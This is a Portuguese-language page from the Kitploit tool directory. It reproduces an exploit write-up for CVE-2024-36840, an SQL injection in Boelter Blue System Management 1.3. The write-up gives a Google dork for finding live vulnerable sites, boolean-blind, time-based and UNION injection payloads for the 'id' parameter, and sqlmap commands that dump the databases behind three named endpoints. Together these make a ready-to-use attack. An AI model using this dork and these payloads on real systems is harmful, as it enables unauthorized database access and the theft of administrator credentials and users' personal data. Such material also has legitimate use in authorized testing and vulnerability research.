Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-36840-Exploit — # Exploit Para: CVE-2024-36840: Vulnerabilidade de Injeção SQL no Boelter Blue System Management (Versão 1.3) | Kitploit
Ferramentas/GitHubGitHub/theexploiters/cve-2024-36840-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# Exploit Para: CVE-2024-36840: Vulnerabilidade de Injeção SQL no Boelter Blue System Management (Versão 1.3)

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-36840: Vulnerabilidade de Injeção de SQL no Boelter Blue System Management (Versão 1.3)

Detalhes do Exploit

  • Título do Exploit: Vulnerabilidade de Injeção de SQL no Boelter Blue System Management (versão 1.3)

  • Google Dork Original: inurl:"Powered by Boelter Blue" (não funcionou (zero URLs na pesquisa))

  • Google Dork Pelo Theexploiters: intext:"Powered by Boelter Blue" (funcionando)

  • Data: 2024-06-04

  • Autor do Exploit: CBKB (DeadlyData, R4d1x)

  • Página do Fornecedor: Boelter Blue

  • Link do Software: Google Play Store

  • Versão: 1.3

  • Testado em: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

Descrição da Vulnerabilidade

Múltiplas vulnerabilidades de Injeção de SQL foram identificadas no Boelter Blue System Management (versão 1.3). Essas vulnerabilidades permitem que atacantes injetem e executem comandos SQL arbitrários por meio de vários parâmetros. A exploração bem-sucedida pode resultar em acesso não autorizado, exfiltração de dados e possíveis tomadas de conta.

Parâmetros Afetados e Detalhes do Exploit:

  1. Parâmetro: id (GET)

    • Tipo: Cego baseado em booleano
    • Payload: id=10071 AND 4036=4036
  2. Tipo: Cego baseado em tempo

    • Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. Tipo: Consulta UNION

    • Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

Endpoints Vulneráveis

  1. news_details.php?id

    • Exemplo: https://www.example.com/news_details.php?id=10071
    • Exploração:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • Exemplo: https://www.example.com/services.php?section=5081
    • Exploração:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • Exemplo: https://www.example.com/location_details.php?id=836
    • Exploração:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

Impacto

  • Acesso Não Autorizado ao Banco de Dados: A exploração pode levar ao acesso não autorizado ao banco de dados, permitindo que atacantes extraiam informações sensíveis.
  • Vazamento de Dados: Dados sensíveis, como credenciais de administrador, PII de usuários e histórico de compras, podem ser comprometidos.
  • Tomada de Conta: Atacantes podem potencialmente assumir contas de usuários.
  • Controle Total: O controle total sobre o aplicativo afetado pode ser alcançado, levando a graves implicações de segurança.

Créditos

  • Descobridores: CBKB (DeadlyData, R4d1x)

Referências

  • Relatório de Vulnerabilidade do CyberDepot
  • CVE-2024-36840

Repo View Counter

Baixar ferramenta